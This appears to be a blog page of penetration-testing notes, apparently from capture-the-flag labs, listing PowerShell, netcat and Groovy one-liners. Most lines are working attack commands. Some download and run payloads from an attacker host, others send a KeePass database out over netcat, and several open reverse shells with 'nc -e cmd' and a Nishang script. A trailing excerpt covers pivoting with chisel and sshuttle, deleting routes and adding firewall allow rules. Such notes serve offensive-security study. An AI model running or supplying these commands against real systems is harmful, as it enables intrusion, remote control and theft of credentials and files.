Skip to main content

Some Powershell Commands

Download a File using Power Shell:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')

Download a File Using Power Shell:

nc.exe 10.10.14.19 8002 < CEH.kdbx

Download and Execute Powershell Script on Victim Machine

Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")

python -m SimpleHTTPServer 8001

nc -nvlp 9001

#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1 
Download and Execute Powershell Script on Victim Machine - Method II 

powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe 

python -m SimpleHTTPServer 8001

C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 

nc -nvlp 9001

Execute a Command in Java Shell:

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Execute a Command in Java Shell:
println "cmd.exe /c dir".execute().text
Upload a file using Power shell: in a java shell
def process = "powershell -command Invoke-WebRequest 'http://10.10.14.19:8001/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Get a Reverse Shell using Powershell:
def process = "powershell -command ./nc.exe 10.10.14.19 9001 -e cmd.exe".execute(); 
println("${process.text}");

nc.exe should be in the same directory; use the above command to download it. 
Check for Hidden Files:

 get-content .\root.txt -stream *

 get-content .\root.txt -stream root.txt



Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...